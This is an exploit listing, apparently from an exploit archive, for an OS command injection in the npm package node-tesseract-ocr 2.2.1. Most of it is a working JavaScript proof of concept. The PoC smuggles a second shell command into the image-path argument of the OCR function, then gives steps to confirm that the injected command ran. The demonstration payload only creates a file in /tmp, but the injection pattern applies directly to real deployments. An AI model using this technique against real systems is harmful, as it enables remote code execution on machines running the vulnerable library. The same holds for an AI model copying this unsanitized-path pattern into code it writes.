Share
## https://sploitus.com/exploit?id=PACKETSTORM:219822
==================================================================================================================================
    | # Title     : node-tesseract-ocr 2.2.1 OS Command Injection via Unsanitized Image Path Leading to RCE                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.npmjs.com/package/node-tesseract-ocr                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : In node-tesseract-ocr version 2.2.1, a security vulnerability allows OS command injection when attacker-controlled image paths are passed to the OCR function.
    
    [+] POC        :  exploit-basic.js
    
    const tesseract = require('node-tesseract-ocr');
    
    
    const maliciousImagePath = 'test.jpg"; touch /tmp/pwned.txt; echo "x';
    
    const config = {
        lang: 'eng',
        oem: 1,
        psm: 3,
    };
    
    console.log("[+] CVE-2026-26832 - node-tesseract-ocr OS Command Injection Exploit");
    console.log("[+] Malicious image path:", maliciousImagePath);
    console.log("[+] Attempting to recognize text...");
    
    tesseract.recognize(maliciousImagePath, config)
        .then(text => {
            console.log("[+] OCR completed (injection might still have worked)");
            console.log("Extracted text:", text);
        })
        .catch(error => {
            console.log("[!] OCR failed (but command may have executed before the error)");
            console.log("Error:", error.message);
        })
        .finally(() => {
            console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
            console.log("[*] If the file exists, the exploit was successful!");
        });
    node-tesseract-ocr 2.2.1
    	
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================